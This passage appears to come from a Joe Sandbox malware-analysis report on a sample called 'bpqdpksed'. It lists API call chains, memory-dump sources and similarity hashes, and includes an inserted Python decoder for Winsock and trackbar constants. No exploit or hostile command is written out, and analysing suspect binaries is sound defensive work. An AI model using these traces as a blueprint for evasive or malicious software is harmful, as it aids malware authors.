                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$socket
                                                                                              • String ID:
                                                                                              • API String ID: 1881357543-0
                                                                                              • Opcode ID: 00a10ef5dd98b6060904a89f5c17a9a790560afcd8bdd157f9a178abba2fa6b6
                                                                                              • Instruction ID: acbe27fa7e5e04c786d5156376dcfdfe11fceade3b89688d090dcbed2c9301de
                                                                                              • Opcode Fuzzy Hash: 00a10ef5dd98b6060904a89f5c17a9a790560afcd8bdd157f9a178abba2fa6b6
                                                                                              • Instruction Fuzzy Hash: 3141BF78600200AFE720AF64C896F3A77A5EB04708F58C448F95A9F3D2D672ED41CBB0
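The two records above (the `msctls_trackbar32` SendMessageW chain and the `socket` / `#21` WSOCK32 chain) are only readable once the raw argument values are mapped back to SDK names: `#21` is an import by ordinal, and `0000FFFF` / `00000020` are `SOL_SOCKET` / `SO_BROADCAST`. The following decoder is an added example, not output of Joe Sandbox and not code from the sample; it parses the report's own `APIs` lines (the sample lines are copied verbatim from the records on this page), resolves wsock32.dll ordinals from the Winsock import table, and names the constants for the three call shapes these records use. The ordinal and constant tables are taken from the Winsock and CommCtrl SDK headers; the `TBM_*` reading of the `WM_USER+n` messages is only valid because the record's String ID identifies the target window class as `msctls_trackbar32`, since `WM_USER` messages are control-specific.

```python
import re
from dataclasses import dataclass

# Sample input, copied from the APIs lines of the two records on this page.
SAMPLE_LINES = [
    "socket.WSOCK32(00000002,00000002,00000011), ref: 00DE245A",
    "WSAGetLastError.WSOCK32 ref: 00DE2468",
    "#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DE24E7",
    "SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DF4BC3",
]

# wsock32.dll / ws2_32.dll export ordinals (Winsock import library).
WSOCK32_ORDINALS = {
    1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 5: "getpeername",
    6: "getsockname", 7: "getsockopt", 8: "htonl", 9: "htons", 10: "inet_addr",
    11: "inet_ntoa", 12: "ioctlsocket", 13: "listen", 14: "ntohl", 15: "ntohs",
    16: "recv", 17: "recvfrom", 18: "select", 19: "send", 20: "sendto",
    21: "setsockopt", 22: "shutdown", 23: "socket",
}
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IPPROTO = {0: "0 (default)", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SOL = {0xFFFF: "SOL_SOCKET", 6: "IPPROTO_TCP"}
SO_OPT = {
    0xFFFF: {0x4: "SO_REUSEADDR", 0x8: "SO_KEEPALIVE", 0x20: "SO_BROADCAST", 0x80: "SO_LINGER"},
    6: {1: "TCP_NODELAY"},
}
WM_USER = 0x400
# Trackbar messages (commctrl.h); meaningful only for an msctls_trackbar32 HWND.
TRACKBAR_MSG = {WM_USER + 5: "TBM_SETPOS", WM_USER + 6: "TBM_SETRANGE", WM_USER + 20: "TBM_SETTICFREQ"}

# "<export>.<MODULE>(<hex args>), ref: <addr>"; the parens are absent when the
# sandbox recorded no arguments, and an ordinal import is written as "#<n>".
LINE_RE = re.compile(
    r"^(?P<name>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # int per argument, None where the report shows "?" (unresolved)
    ref: int        # call-site address in the dumped image
    decoded: str = ""


def fmt(table, value):
    """Name a constant from `table`, falling back to hex; '?' for unresolved."""
    if value is None:
        return "?"
    return table.get(value, f"0x{value:X}")


def describe(call):
    a = call.args
    if call.name == "socket" and len(a) == 3:
        return f"socket({fmt(AF, a[0])}, {fmt(SOCK_TYPE, a[1])}, {fmt(IPPROTO, a[2])})"
    if call.name == "setsockopt" and len(a) == 5:
        level = a[1]
        opt = fmt(SO_OPT.get(level, {}), a[2])
        return f"setsockopt(s, {fmt(SOL, level)}, {opt}, optval, optlen={a[4]})"
    if call.name == "SendMessageW" and len(a) == 4 and a[1] in TRACKBAR_MSG:
        msg = TRACKBAR_MSG[a[1]]
        if msg == "TBM_SETRANGE" and a[3] is not None:
            # lParam is MAKELONG(min, max); wParam is the redraw flag.
            return f"{msg}(min={a[3] & 0xFFFF}, max={a[3] >> 16}, redraw={a[2]})"
        return f"{msg}(wParam={a[2]}, lParam={a[3]})"
    rendered = ", ".join("?" if v is None else f"0x{v:X}" for v in a)
    return f"{call.name}({rendered})"


def parse_line(line):
    m = LINE_RE.match(line.strip().lstrip("• ").strip())
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    name, module = m["name"], m["module"].upper()
    if name.startswith("#") and module in ("WSOCK32", "WS2_32"):
        name = WSOCK32_ORDINALS.get(int(name[1:]), name)   # resolve ordinal import
    args = []
    if m["args"]:
        args = [None if t.strip() == "?" else int(t, 16) for t in m["args"].split(",")]
    call = ApiCall(name, module, args, int(m["ref"], 16))
    call.decoded = describe(call)
    return call


def decode_chain(lines):
    """Decode every APIs line of a record, in call order."""
    return [parse_line(line) for line in lines]


if __name__ == "__main__":
    for c in decode_chain(SAMPLE_LINES):
        print(f"{c.ref:08X}  {c.module:<8} {c.decoded}")
```

Run against the two records it reads as: a `socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)` followed by `setsockopt(s, SOL_SOCKET, SO_BROADCAST, ...)`, i.e. a UDP socket with broadcast sends enabled, and `TBM_SETRANGE(min=0, max=100, redraw=0)` on the trackbar. Arguments the sandbox could not resolve stay as `?`, so a decoded name is never invented for a value the report does not carry; extend the constant tables before trusting the fallback hex for other levels or option names.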
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00DF6C41
                                                                                              • ScreenToClient.USER32(?,?), ref: 00DF6C74
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DF6CE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: 5b877d689961a8496ad9d2e313aaa8db20a8aacf2d8429fda4bb5c25c8e64b7a
                                                                                              • Instruction ID: 3d7760a2e52e521921741da4dfbb00112aaaf519d0370201c45c332e9eee8196
                                                                                              • Opcode Fuzzy Hash: 5b877d689961a8496ad9d2e313aaa8db20a8aacf2d8429fda4bb5c25c8e64b7a
                                                                                              • Instruction Fuzzy Hash: D2514D70A0020CEFCB10DF64C980ABE7BB6EF45360F158159FAA59B690D770ED81CBA0
                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DD60DD
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00DD6103
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DD6128
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DD6154
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: c94c2de6b4291784df1222a85e8427f69b5ad161730d3fbd377edd6d1e7f04bd
                                                                                              • Instruction ID: 19b9a98c232a84a39e44edefda51f82ea3b89d28df748cc70a63d2f73932c6f6
                                                                                              • Opcode Fuzzy Hash: c94c2de6b4291784df1222a85e8427f69b5ad161730d3fbd377edd6d1e7f04bd
                                                                                              • Instruction Fuzzy Hash: 66414B39600610DFCB11EF55C444A5EBBE2EF49720B19C489E94AAB362CB36FD41DBB1
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00DF204A
                                                                                                • Part of subcall function 00DC42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DC42E6
                                                                                                • Part of subcall function 00DC42CC: GetCurrentThreadId.KERNEL32 ref: 00DC42ED
                                                                                                • Part of subcall function 00DC42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DC2E43), ref: 00DC42F4
                                                                                              • GetCaretPos.USER32(?), ref: 00DF205E
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00DF20AB
                                                                                              • GetForegroundWindow.USER32 ref: 00DF20B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 2aa36329cb26ce959f412d265a672847cff8f489c71788252658b56ff2b2c9fa
                                                                                              • Instruction ID: 8a36a42727bc1d574b56fcf463f859ba935f826c9663192d258b9f55b80fc27f
                                                                                              • Opcode Fuzzy Hash: 2aa36329cb26ce959f412d265a672847cff8f489c71788252658b56ff2b2c9fa
                                                                                              • Instruction Fuzzy Hash: DA311E75D00209AFDB04EFAAC9818BEB7F9EF58304B14846AE515E7311EA71DE45CBB0
                                                                                              APIs
                                                                                                • Part of subcall function 00D64154: _wcslen.LIBCMT ref: 00D64159
                                                                                              • _wcslen.LIBCMT ref: 00DCE7F7
                                                                                              • _wcslen.LIBCMT ref: 00DCE80E
                                                                                              • _wcslen.LIBCMT ref: 00DCE839
                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00DCE844
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ExtentPoint32Text
                                                                                              • String ID:
                                                                                              • API String ID: 3763101759-0
                                                                                              • Opcode ID: bde044b01014ccd18edcdf9103396e114c1319a08ea6ccc80fc94b43122a20d1
                                                                                              • Instruction ID: 6f7d115f57aabb1c31cdede988d864be9da331f697f06a3413de9f33b592356a
                                                                                              • Opcode Fuzzy Hash: bde044b01014ccd18edcdf9103396e114c1319a08ea6ccc80fc94b43122a20d1
                                                                                              • Instruction Fuzzy Hash: 5B2183B1D01315AFDB10AFA8C981BAEB7F8EF95760F144069E904BB281D6749E4187B1
                                                                                              APIs
                                                                                                • Part of subcall function 00DC960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DC8199,?,000000FF,?,00DC8FE3,00000000,?,0000001C,?,?), ref: 00DC961B
                                                                                                • Part of subcall function 00DC960C: lstrcpyW.KERNEL32(00000000,?,?,00DC8199,?,000000FF,?,00DC8FE3,00000000,?,0000001C,?,?,00000000), ref: 00DC9641
                                                                                                • Part of subcall function 00DC960C: lstrcmpiW.KERNEL32(00000000,?,00DC8199,?,000000FF,?,00DC8FE3,00000000,?,0000001C,?,?), ref: 00DC9672
                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DC8FE3,00000000,?,0000001C,?,?,00000000), ref: 00DC81B2
                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,00DC8FE3,00000000,?,0000001C,?,?,00000000), ref: 00DC81D8
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DC8FE3,00000000,?,0000001C,?,?,00000000), ref: 00DC8213
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 4031866154-3896280584
                                                                                              • Opcode ID: ebf1520fbc21690535bd0630060cc10ffab17774fa3fbb356e961deb2e4bac4a
                                                                                              • Instruction ID: 074355fce05f9583cb01a3ac8cc5cb2b3af494217bc612b1bbb1135393e686a6
                                                                                              • Opcode Fuzzy Hash: ebf1520fbc21690535bd0630060cc10ffab17774fa3fbb356e961deb2e4bac4a
                                                                                              • Instruction Fuzzy Hash: 1611D63A200342ABCB145F34D859F7AB7AAFF95350B54402EF946CB250EF319811D774
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00DF866A
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DF8689
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DF86A1
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DDC10A,00000000), ref: 00DF86CA
                                                                                                • Part of subcall function 00D62441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D62452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID:
                                                                                              • API String ID: 847901565-0
                                                                                              • Opcode ID: 70df3799ccbabfb0bb1c9e4cebf550c845bcceed78fa32d8c619d0fc0ce76e33
                                                                                              • Instruction ID: ae19f49eb417525be87bf0ce31cb365760b61c6d5d439e6ae419c1e4853a7209
                                                                                              • Opcode Fuzzy Hash: 70df3799ccbabfb0bb1c9e4cebf550c845bcceed78fa32d8c619d0fc0ce76e33
                                                                                              • Instruction Fuzzy Hash: 9A11753250021D9FCB109F29DC08A763BA5EB45374F168728FE39DB2E0DB309911EB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e160d1c3fcaad10974a759c1875b8beb6eb699778c1c9aae68cf3935481e30b2
                                                                                              • Instruction ID: 390e670fa71a631f966fa7fb5445b813c444a26ddafe5969519f088a1278f5eb
                                                                                              • Opcode Fuzzy Hash: e160d1c3fcaad10974a759c1875b8beb6eb699778c1c9aae68cf3935481e30b2
                                                                                              • Instruction Fuzzy Hash: D901D6B22093157EFF2126786CC1F37670EDF423B8B350325F621A12D5DA708C5085B0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00DC22D7
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DC22E9
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DC22FF
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DC231A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: cae3bbaabb26e33395b8b2a46ec1388b866eced09cf96e4a42719886e16510b6
                                                                                              • Instruction ID: 375d164c8ec9386c0b994d1fa08eac5c1ef41ecca1462f756061831cb43481a4
                                                                                              • Opcode Fuzzy Hash: cae3bbaabb26e33395b8b2a46ec1388b866eced09cf96e4a42719886e16510b6
                                                                                              • Instruction Fuzzy Hash: 9F110C36900219FFDB11DBA5CD85FADFB78EB08750F200095EA01B7290D6716E10DBA4
                                                                                              APIs
                                                                                                • Part of subcall function 00D62441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D62452
                                                                                              • GetClientRect.USER32(?,?), ref: 00DFA890
                                                                                              • GetCursorPos.USER32(?), ref: 00DFA89A
                                                                                              • ScreenToClient.USER32(?,?), ref: 00DFA8A5
                                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00DFA8D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4127811313-0
                                                                                              • Opcode ID: b88f1dd5148b959ec7388ef33076ed67f8f2e327f3c6a01533df8ca1f747aff2
                                                                                              • Instruction ID: 82cc6f162e7212186c12107dca308648d8a57becd3bcc5f11d255560d60dfda6
                                                                                              • Opcode Fuzzy Hash: b88f1dd5148b959ec7388ef33076ed67f8f2e327f3c6a01533df8ca1f747aff2
                                                                                              • Instruction Fuzzy Hash: 391136B190011DEFDF14DF98D8499FE7BB9FB05340F028456EA15E6250D770AA82CBB2
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00DCEA29
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00DCEA5C
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DCEA72
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DCEA79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2880819207-0
                                                                                              • Opcode ID: e2bee6fb99b693164871978e644ba1cff0db0df855d5612b7f6155812146482f
                                                                                              • Instruction ID: b3a06dcaf4c5d551c6c363437a4585b3422c7c9747c4bcf66dfc35b7f1842240
                                                                                              • Opcode Fuzzy Hash: e2bee6fb99b693164871978e644ba1cff0db0df855d5612b7f6155812146482f
                                                                                              • Instruction Fuzzy Hash: 1D11A9B590035AAFC711AB689C09FAE7FAEAB45310F14825AF515E3290D674890487B1
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00DF8792
                                                                                              • ScreenToClient.USER32(?,?), ref: 00DF87AA
                                                                                              • ScreenToClient.USER32(?,?), ref: 00DF87CE
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DF87E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: e7df401eda2b51700dcca2c696db76f70e36e58efcdc639f2043e881256195d7
                                                                                              • Instruction ID: db75f07855f0cc139e7642ca186ced2391097d5f65ded7ea87825bd18e39e020
                                                                                              • Opcode Fuzzy Hash: e7df401eda2b51700dcca2c696db76f70e36e58efcdc639f2043e881256195d7
                                                                                              • Instruction Fuzzy Hash: 8B1140B9D0024DAFDB41DFA8D884AEEBBB5FB08314F108166E915E3210D735AA54DF61
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 00D6216C
                                                                                              • SetTextColor.GDI32(?,?), ref: 00D62176
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00D62189
                                                                                              • GetStockObject.GDI32(00000005), ref: 00D62191
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ModeObjectStockText
                                                                                              • String ID:
                                                                                              • API String ID: 4037423528-0
                                                                                              • Opcode ID: 6861b2d0e7a93015461e9b46265171fb6cbe31243f0e3561791c9f3737252f83
                                                                                              • Instruction ID: d2f054f6184a50e00b8a96a2af941e82553dc5dc0c2170a1899b8cfc12645620
                                                                                              • Opcode Fuzzy Hash: 6861b2d0e7a93015461e9b46265171fb6cbe31243f0e3561791c9f3737252f83
                                                                                              • Instruction Fuzzy Hash: F8E03031644740AADB215B74AC097E87B23AB12336F18C215F6BA881E0C3724640DB30
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00DBEBD6
                                                                                              • GetDC.USER32(00000000), ref: 00DBEBE0
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DBEC00
                                                                                              • ReleaseDC.USER32(?), ref: 00DBEC21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
